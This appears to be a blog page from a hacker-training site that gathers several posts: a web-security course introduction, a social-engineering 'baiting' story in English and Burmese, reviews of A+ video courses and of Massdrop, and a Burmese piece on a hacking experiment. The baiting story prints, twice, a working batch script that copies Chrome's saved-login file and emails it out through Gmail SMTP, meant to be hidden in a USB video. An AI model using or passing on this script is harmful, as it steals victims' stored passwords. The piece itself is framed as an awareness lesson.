Security for Web Developers: 02: What Determines Your Website’s Security?

Security Padlock

Relatively speaking, your security is:

  • Higher if you hold little or no financial information, or have few network resources,
  • Higher if your server is vigorously patched and correctly configured,
  • Higher if your code is built to high standards and
  • Higher if the network connecting your site to the Internet has tight permissions.

You can employ formal measurement metrics, like this one from ISACA: http://www.isaca.org/Journal/archives/2011/Volume-4/Pages/Measure-and-Monitor-Application-Security.aspx

Or you can employ an “alternative” methodology like this one from White Hat Security: https://www.whitehatsec.com/blog/if-you-want-to-improve-something-measure-it/

Next: http://schoolforhackers.com/security-web-developers-makes-website-insecure/

Security for Web Developers: 01

Blue Security Goddess

With Glenn Norman

Get a basic understanding of how servers and security play a key role in the overall functioning of websites. This course will introduce you to the concepts of storing content, such as the basic programming of a website to the design elements, and ways to keep your website and your users safe in the sometimes dangerous world of the Internet.

Objectives

You will learn to recognize the risk factors your particular web applications face, and how to determine the specific vulnerabilities within your site, app and code.

You will try out some of the web-app security-testing tools that will be used against you. Often these will identify the most obvious vulnerabilities you should address.

Then we will discuss the most common code and configuration issues, as well as plugins and services for monitoring your site.

Next: http://schoolforhackers.com/determines-websites-security/

Well-known Social Engineering Ways

A brilliant engineer would hack out a smart solution to the problem at hand, and consider it a compliment to be called a hacker.  – For more reads please read the article Hack to live at http://schoolforhackers.com/category/hacking-tools/. The sure thing is; you find the way to get what you want to have. Let’s talk about a well-known social engineering way out of 5 here we would like to discuss.

  1. Baiting

               This way is named as baiting allegorically. It is similar to phishing (fishing) attack. The items or goods, a hacker use to entice victims distinguish them from other types of social engineering. Baiters focus on human curiosity via the use of physical media and they might offer users free audio and movie downloads.

Race Start

Min Mg Mg put some USB sticks around his roommates’ desks and practical room. One of his roommates picks up a USB Stick and was really curious to open it on his laptop then he opened. “Wow, many audios here, and videos as well, that’s really luck. Look, this video is interesting its name is “Myself”, let’s check it out the video to know whose USB stick is this.” He was muttering when he opened the video. “Grandpa, I put a video file that hooked with a barb; a batch file –

@echo off

color 08

mkdir \a  C:\Users\%username%\Documents\sm

move /Y sendEmail.exe C:\Users\%username%\Documents\sm

PATH=%path%; C:\Users\%username%\Documents\sm

cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\

xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C

cd C:\Users\%username%\Documents\

copy  /Y “Login Data” LoginData

cd  C:\Users\%username%\Documents\sm\

sendEmail -f from@gmail.com -u subject -m Message Body  -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes

start http://www.animateit.net/data/media/feb2013/love_roses_03.gif

 

with the playful windows script and it’s converted as a exe using bat to exe converter. I bound it with a Video file and sendEmail.exe files. Sooner I might have the Login Data file from his Google Chrome. When I put the Login Data to my Chrome profile I’ll see his saved password, if he saved his password on his browser.” Min Mg Mg said to grandpa when he was staring at his screen.

Race End            

Of course, we should be curious for the happiness of getting a USB on the street. You might want to keep in mind there are attackers out there who are doing these attack on purposes, even if the mentioned script is an amateur window script.

လူသိမ်ားတဲ့ Social Engineering နည္းလမ္းမ်ား

ကြ်မ္းက်င္တဲ့ အင္ဂ်င္နီယာတစ္ေယာက္က လက္ရွိၿပႆနာတစ္ခုကုိ ေၿဖရွင္းဖုိ႔နည္းလမ္းရွာသစ္ေတြရွာေဖြေတြ႔ရွိၿခင္းကုိ ဟက္ကင္း တစ္ခုလုိ႔ေခၚႏုိင္ပါတယ္ – http://schoolforhackers.com/category/hacking-tools/ မွ ကုိးကားေဖၚၿပထားတဲ့ Hack to live ဆုိတဲ့ ေဆာင္းပါးတစ္ခုမွာ ပုိမိုဖတ္ၾကည့္ႏုိင္ပါတယ္။ ေသခ်ာတာက ခင္ဗ်ားလုိခ်င္တာ၊ ၿဖစ္ေစခ်င္တာကုိ ရေအာင္ရယူတဲ့၊ ၿဖစ္ေအာင္လုပ္တဲ့ နည္းလမ္းရွာေဖြ လုိက္တာပဲေပါ့။ အသံုးမ်ားတဲ့ social engineering နည္းလမ္း ၅ ခုေလာက္ေဆြးေႏြးၾကည့္ရေအာင္။

၁။ ငါးစာခ်ၿခင္း (biating)

               ငါးစားခ်ၿခင္းလုိ႔ တင္စားထားတာပါ။ ထုိနည္းလမ္းက ငါးမွ်ားၿခင္းလုိ႔သိႏုိင္တဲ့ Phishing နည္းလမ္းနဲ႔ တူပါတယ္။ အၿခား social engineering ေတြနဲ႔ ကြာၿခားခ်က္ကေတာ့၊ ဟက္ကာက ပစ္မွတ္ကုိ ၿဖားေယာင္းရန္ အသံုးၿပဳတဲ့ အခ်က္ေတြပါပဲ။ baiter ေတြက သီခ်င္းေတြ၊ ရုပ္ရွင္ေတြ အခမဲ့ေဒါင္းလုတ္ လုပ္ႏုိင္ရန္ ကမ္းလွမ္းေပးတတ္ၾကပါတယ္။ ထုိနည္းလမ္းက တုိက္ခိုက္သူေတြက လူေတြရဲ႕ စပ္စုခ်င္စိတ္ ေပၚမွာ ရုပ္၀တၳဳၾကားခံေတြ သံုးၿပီး တုိက္ခုိက္တဲ့ နည္းလမ္းတစ္ခုၿဖစ္ပါတယ္။

ကစားပြဲစတင္

မင္းေမာင္ေမာင္က ယူအက္စ္ဘီ စတစ္ေလးေတြကုိ သူ႔အခန္းေဖါ္ေတြရဲ႕ စားပြဲနားမွာ၊ လက္ေတြ႔ခန္း ၀န္းက်င္မွာ ခ်ထားခဲ့ ပါတယ္။ သူအခန္းေဖၚတစ္ေယာက္က ယူအက္စဘီ စတစ္ေလးကုိ ေကာက္ယူထားၿပီး ဘာေတြမ်ားပါမလဲလုိ႔ သူ႔ လပ္ေတာ့ခ္မွာ ဖြင့္ၾကည့္ လုိက္ပါတယ္ ။  ။  “ဟာ သီခ်င္းေတြအမ်ားၾကီးပဲ၊ ဗြီဒီယုိေတြလည္းပါတယ္၊ ပြတာပဲေဟ့။ ဒီမွာ စိတ္၀င္စားစရာ ဗြီဒီယိုက “ငါ့ အေၾကာင္း” ဆုိပါလား ဖြင့္ၾကည့္လုိက္ဦးမယ္ ဘယ္သူ႔ စတစ္ဆိုတာသိရတာေပါ့။” အခန္းေဖၚက ေရရြတ္ရင္း ဗီြဒီယုိေလးကုိ ဖြင့္ၾကည့္ လုိက္ပါတယ္။ မင္းေမာင္ေမာင္က “အဖုိးေရကြ်န္ေတာ္ အဲဒီ စတစ္ထဲမွာထည့္ထားတဲ့ ဗြီဒီယိုဖုိင္နဲ႔ တဲြခ်ိတ္ထားတဲ့ ငါးမ်ွားခ်ိတ္ကေတာ့ ။ ။ batch ဖုိင္ေလးတစ္ဖုိင္ပါပဲ၊ အဲဒီဖုိင္ထဲမွာ –

@echo off
 
color 08
 
mkdir \a C:\Users\%username%\Documents\sm
 
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
 
PATH=%path%; C:\Users\%username%\Documents\sm
 
cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\
 
xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C
 
cd C:\Users\%username%\Documents\
 
copy /Y “Login Data” LoginData
 
cd C:\Users\%username%\Documents\sm\
 
sendEmail -f from@gmail.com -u subject -m Message Body -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes
 
start http://www.animateit.net/data/media/feb2013/love_roses_03.gif

 

ဒီ windows script ေလးတစ္ခ်ိဳ႕ေရးထားတယ္၊ ၿပီးေတာ့ bat to exe ေၿပာင္းၿပီး sendEmail.exe ရယ္၊ ဗီြဒီယိုဖုိင္ တစ္ဖုိင္ရယ္နဲ႔ တြဲ ထားလုိက္တယ္။ သိပ္မၾကာခင္၊ သူ႔ရဲ႕ Google Chrome ထဲက LoginData ဖုိင္ကို ကြ်န္ေတာ္ရေတာ့မယ္၊ တကယ္လုိ႔ သူက browser မွာ စကား၀ွက္ေတြ သိမ္းထားရင္ေတာ့၊ သူ႔ logindata ဖုိင္ကုိ ကြ်န္ေတာ့ Google Chrome Profile ထဲ ထည့္လုိက္ရင္ သူ့ browser မွာ သိမ္းထားတဲ့ စကား၀ွက္ေတြ ရေတာ့မွာေပါ့ဗ်ာ။” လုိ႔ ကြန္ၿပဴတာ ဖန္သားၿပင္ေပၚမွာ စုိက္ၾကည့္ရင္း ေၿပာလုိက္ပါတယ္။

ကစားပြဲၿပီးဆံုး           

 ဒါေပါ့ဗ်ာ၊ ယူအက္စ္ဘီေလး ေကာက္ရတယ္ဆုိၿပီး၊ မစပ္စု သင့္ပါဘူး။ ေဖၚၿပထားတဲ့ script ေလးက၊ အေပ်ာ္တမ္းဆုိေပမယ့္၊ အၿပင္မွာ တစ္ကယ္ရည္ရြယ္ခ်က္ရွိရွိ တုိက္ခုိက္ေနတဲ့ တုိက္ခုိက္သူေတြ တကယ္ရွိေနတယ္ဆုိတာ သတိထားသင့္ပါတယ္။

Get Certified! Pearson’s A+ Video Courses: A Serious Alternative to Classroom Training

Glenn Norman

Video training has become a really big business. I’m a classroom teacher myself, and teach the A+ certification and several others, so the question of whether video training can replace classroom time is pretty personal, and I come at it a little skeptically. I’ve endured some truly painful online and video training courses, and I’m betting my gentle reader has too. Do they have to be awful? Or can they truly be good enough to replace “live” teachers? And more important, are they a good bargain relative to live classes?

No, they don’t have to be awful. Some are definitely better than others. Twenty years ago the user interfaces were mish-mashes, a situation that has hugely improved. Today they’ve almost all settled toward uniform layouts, which honestly improves the user experience across the board. It’s great to have a course outline with links to lessons down one side of the workspace or the other, for instance. Live classes often have a separate area for text material and another column for chat. Sometimes there’s a panel for downloadable materials, and sometimes all of these are wrapped up in one tabbed column (my favorite). What really matters is, which of these elements are included in a given course? And far more critical, how good is the actual presentation material?

In this case the material is quite good. The video pane alternates between Powerpoint-like slides, detailed video close-ups of hardware and actual assembly, and the presenter (whom I presume is David Prowse himself) talking and using a white board. This last is kind of classroom-like, complete with quick-and-dirty sketches. David has a good physical presence and a good speaking voice, so it works well. The frequent change of visual layout keeps things interesting, which is critical for recorded trainings. And the level of detail is really quite good; at 20+ hours for the 901 video course and 40+ for both 901 and 902, it’s close to the number of hours most live classes will run. That’s a lot of material, but in small chunks running about five minutes each. This is a popular format length these days: most students like being able to “drop in” to the course when they have some free time without making an hour-long commitment. Plus, it’s not so painful if you have to repeat a lecture. Personally, I find myself reluctant to start hour-long lessons online, but I can devour a five-minute video almost any time.

Lessons consist of Learning Objectives, lectures, Performance Based Exercises (very much like the ones you’ll find on the actual test) and PC Build demonstrations. The Learning Objectives aren’t a boring list of topics; instead, David gives a brief but much more informative talk about the lesson. Some Performance Based Exercises are classic drag-and-drop matching tasks, but some require you to demonstrate actual familiarity with Windows by, for instance, setting a static IP address, which is a highly relevant skill. The overall high-quality video production really shines in the PC Build walkthroughs, though these may be most useful for less experienced students. Modules are collections of Lessons, and include Module Quizzes (again, very similar to actual test questions). Most textbooks in this area include at least a couple of sample tests, whether on CD or by download. With this package you get a series of Module Quizzes, which as I’ve mentioned are pretty good, but you don’t get formal timed sample exams.

Can really hi-res video of motherboards and RAM and video cards replace the hands-on, pass-it-around of a live class? Put simply, yes, provided you’re already familiar with these things. But no, not if you’ve never handled them. How should you hold a stick of RAM? What part(s) should you never touch? If you picked up a module in a job interview would you be comfortable holding it? If these questions just make you laugh, you’re a good candidate for this course.

There were a couple of things I missed in the user interface package. There are no Supplementary Materials, which is a pretty small issue in a really complete package like this one, though I’ve run into some really valuable supplementary handouts from time to time. But the lack of student-teacher interaction might be a more serious issue. This is obviously the primary benefit of a live classroom or online class: you can say, Wait, I’m stuck on this, or I can’t make that work, or Mine doesn’t look like that. I’ve seen the chat window fill with questions, and I’ve found some of the most valuable material there when an instructor is provoked to a deeper explanation.

Some of the online course platforms use a hybrid method, where the course is recorded but the chat function is always available (and teachers are expected to respond to inquiries, even months or years later). Given the model of this video courseware, that’s not practical here. But this lack does take the course another big step away from the live classroom.

What really matters here is, can you take this video course and pass the A+ exam? There’s never a certain answer to that, because so much depends on the experience you bring. Some people are really successful at passing certification tests simply by reading a book or two; those people usually are already familiar with the topic and have advanced study skills. Most of us need more. If you can’t take a classroom course where you live, a video course is a very good alternative, at least if the course itself is high-quality, though I’d recommend spending some serious hands-on time with real hardware. The past few years have seen courses like this one dramatically improve, and at this point they’re certainly a viable alternative, especially if you’re relatively disciplined about your study – and like learning from videos rather than books.

Now for brass tacks: you can take two live courses for the 901 and 902 tests, with textbooks and test vouchers included, for about $2000 depending on your area. These two video courses list as a $499 package as I write this, much more expensive than a textbook and not including the tests, which will run you another $450. You could buy a text and some sample tests and spend barely more than half the price of classroom courses. If you’ve already got some experience with PCs, this could be a real steal for you.

Pearson IT Certification CompTIA A+ 220-901 Complete Video Course – January 22, 2016

By David L. Prowse

ISBN-13: 978-0-13-449930-7 / ISBN-10: 0-13-449930-1

Also see

Pearson IT Certification’s CompTIA A+ 220-901 and 220-902 Complete Video Course Library – April 18, 2016

Tech and Gamer Gear Galore: Massdrop

Daniel Clarke

Massdrop (www.massdrop.com) is a group-buy website located out of New Jersey where people commit to buying a product. Once enough people commit to buying the product, the price begins to drop. After the drop has ended, Massdrop will place an order with the manufacturer. Massdrop has several different “communities” that it uses to list like products in the same area. A few of these communities include: Everyday Carry for knives and useful tools that you can keep in your pocket, Audiophile to suit your listening needs, and Tech for gadgets like a Raspberry Pi or other devices. Those are just a few of the (currently) 13 communities that Massdrop has to offer.

As an example, we’ll look at the DXRacer OH/IS11 Iron Series Chair. The drop can be located at https://www.massdrop.com/buy/dxracer-oh-is11-iron-series-chair. You’ll need to authenticate with Facebook or create an account using an email address; we suggest anonymizing services like Mailinator.com.

Each product has different requirements for the total number of people needed in order to get the discounted price. When the chair first “dropped” or came available for purchase, it was listed for $399.99. As more people purchase the chair, the price drops by $10 with every five people until it reaches the lowest price available of $369.99.

Stages of a Drop
Gamer chairs!

If you are interested in the product but only want it if it reaches the maximum discount, you can commit to buy the product at the lowest price. IMAGE (Commit) To compare the requirements for purchase, we will look at some GMK QMX-Clip Sound Dampening Brackets (located at https://www.massdrop.com/buy/gmk-sound-dampening-brackets).

Stages of a Drop: 2
Stages of a Drop: 2

These brackets are used to dampen the sound coming from a mechanical keyboard and are much cheaper than the chair. In order for it to be cost effective for both Massdrop and GMK, more people need to purchase the clips in order to justify a group-buy discount. In this case, at least 50 people are needed to get a discount with 100 people needed to reach the maximum discount.

Now, before you rush onto the site and place a bunch of orders, there are a few issues to understand about Massdrop.

One major complaint is the amount of time that it takes to receive a package. For example, I ordered a wicked set of keycaps on September 30,2015 (https://www.massdrop.com/buy/danger-zone-sa-keycap-set). The keycaps (I know, they’re badass huh?) didn’t arrive until February 17, 2016. Four and a half months is almost unheard of to wait for a product to reach you, especially when Amazon Prime will ship me something in 2 days. One reason is that it was a custom set of keycaps that was made specifically for those who purchased it from Massdrop. The other reason is that your order doesn’t drop ship directly to your door. The manufacturer sends the entire order to Massdrop who then sorts the order and ships it to the customer. I have since purchased other products from Massdrop and both of those orders took about three weeks.

Another major complaint that I have seen, especially recently, is that for products that are not custom made (think knives, chairs, headphones, etc.) it is possible to find the exact same or very similar product for the same price (give or take $5-10) on a major online retailer like Amazon or eBay. In that case, is it worth a few dollars extra to have your product within a week, or are you ok waiting significantly longer to receive it from Massdrop?

Nevertheless, I have used and will continue to use Massdrop.com and watch for new drops that happen daily. If I feel that it is a good deal, I will do my research to make sure that I cannot find the same product for cheaper elsewhere, and if I can’t, I will buy from Massdrop. As a price-conscious consumer, it would be unwise to do differently. As a techie, how can I help myself?

[Daniel Clark is an up-and-coming IT and security consultant in Albuquerque, NM, USA. This is his first contribution to School for Hackers, with more articles on technology and related goodies to come.]

“ကြ်မ္းက်င္ဟက္ကာေတြအဆိုအရ၊ မဟက္ခံရေအာင္ ဘယ္လုိကာကြယ္မလဲ” ေဆာင္းပါးမွ၊ ဟက္ကင္းဆုိင္ရာ အၾကံၿပဳခ်က္

Backlit keyboard

တီဗြီစတားတစ္ေယာက္ၿဖစ္တဲ့ Kevin Roose ဆုိသူက ဒီကိစၥကုိေမးၿမန္းခဲ့ၿပီး၊ သေဘာေပါက္ခဲ့ပါတယ္။ သူက လူေတြဘယ္လုိ ဟက္ခံရတယ္ ဆိုတာကုိ သုေတသနစစ္တမ္း လုပ္ၿခင္ခဲ့တာေၾကာင့္၊ သူ႔ကုိ ဟက္ရန္ လူသိမ်ားတဲ့ ဟက္ကာတခ်ိဳ႕ကုိ သူကုိယ္တုိင္ဖိတ္ၾကား ဖုိ႔ ဆံုးၿဖတ္ခဲ့ပါတယ္။ ၿပီးေတာ့ သူ႕ကို ဟက္ခဲ့ၾကပါတယ္၊ သူ႔ ၀က္ဘ္ ကင္မရာထဲက၊ (ဓါတ္ပံုေတြကုိ ၂မိနစ္တုိင္း) မွ သူ႔ အြန္လုိင္းအေကာင့္ ေတြအထိ ရသမွ် ခရက္ ခဲ့ၾကတယ္။ ပုဂၢိဳလ္ေရးအရေၿပာရရင္ေတာ့၊ ကြ်န္ေတာ္ဆုိရင္ ဒီလုိမလုပ္ပါဘူး။ ထုိသုိ႔လုပ္ၿခင္းက၊ ဟက္လုပ္ၿခင္း တတ္ေၿမာက္ေရး နဲ႔ လူေတြ ဘယ္လုိ ဟက္ခံရတယ္ ဆုိတာေတြကုိ အသားေပးလြန္းေနပါတယ္၊ အေလးေပးရမွာက ဘယ္လုိေတြ မလုပ္ရဘူး ဆုိတာပါပဲ။

သူအဆုိၿပဳတဲ့ တခ်ိဳ႕ေၿဖရွင္းနည္းေတြက အခန္႔မသင့္ရင္ ႏွစ္ဖက္ခြ်န္ဓါးတစ္ေခ်ာင္းနဲ႔တူတတ္တဲ့ password manager အသံုးၿပဳၿခင္းကဲ့သုိ႔၊ ရင္းႏွီးၿပီးသားေတြပါ။ က်န္တာေတြကေတာ့ ကြ်န္ေတာ့္အတြက္ အသစ္ေတြၿဖစ္ေနတယ္ – Little Snitch ဆုိတဲ့ app တစ္ခုကုိ ခင္ဗ်ား ၾကားဖူးပါသလား? အဲဒီ app က၊ ခင္ဗ်ားရဲ႕ outgoing traffic ကုိ သံသရျဖစ္စရာ လႈပ္ရွားမႈေတြ ရွိ၊မရွိ ေစာင့္ၾကည့္ေပးပါတယ္။ (ကြ်န္ေတာ့္ ကြန္ၿပဴတာက ကြ်န္ေတာ့္ credit card ရဲ႕ စာရင္းရွင္းတမ္းေတြကုိ ဘာေၾကာင့္ တရုတ္သို႔ ပုိ႔ေနတာလဲ?)

ၿပီးေတာ့ တခ်ို႕ “အေၿဖမ်ား” က အသံုးၿပဳသူေတြက ကိုယ့္ကုိယ္ကုိ ကာကြယ္ဖုိ႔ၾကိဳးစားရင္း ခ်ိဳးဖ်က္၀င္ေရာက္သူေတြအတြက္ အက်ိဳးရွိ သြားေစတာမ်ုိး ၿဖစ္တတ္ပါတယ္ – ဥပမာ – VPN အသံုးၿပဳတာမ်ိုးေပါ့။  ေရွ႕ေလွ်ာက္ ဒီကိစၥနဲ႔ ပတ္သတ္ၿပီး၊ ခင္ဗ်ားပုိသိရမွာပါ။ အခု လတ္တေလာအတြက္ေတာ့ အလားအလာရွိတဲ့ ခရက္ကာေတြ၊ ဟက္ကာေတြ နဲ႔ လံုၿခံဳေရး ကြ်မ္းက်င္ေတြ အတြက္ ဤေဆာင္းပါးကုိ ဖတ္ၾကည့္ေပးပါ။ (Image courtesy of User: Colin at wikimedia.org)